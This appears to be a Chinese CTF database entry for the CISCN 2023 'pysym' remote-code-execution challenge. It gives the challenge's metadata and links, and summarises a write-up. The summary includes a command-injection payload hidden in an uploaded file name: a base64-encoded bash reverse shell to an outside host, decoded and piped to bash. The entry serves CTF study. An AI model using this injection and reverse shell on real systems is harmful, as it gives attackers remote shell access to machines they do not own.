[随波逐流]CTF Flags

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
返    回

[CISCN 2023 华北]pysym

 广告模块
ID: 11090
标题: [CISCN 2023 华北]pysym
描述: None
类型: RCE
网站: NSSCTF
题目链接: https://www.nssctf.cn/problem/4098
赛事: CISCN
年度: 2023
Flag值:
writeup: https://blog.csdn.net/m0_73512445/article/details/134458958
解析:网页3详细分析了[CISCN 2023 华北]pysym的漏洞利用过程,指出通过修改上传文件名触发os.system命令注入漏洞,利用base64编码绕过过滤,构造反弹shell的payload(如1.tar
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC81aTc4MTk2M3AyLnlpY3AuZnVuLzU4MjY1IDA+JjEn
base64 -d
bash
),并验证了漏洞可成功执行命令 3。该链接直接包含解题代码分析与攻击步骤,符合验证要求。
答案错误,我要更正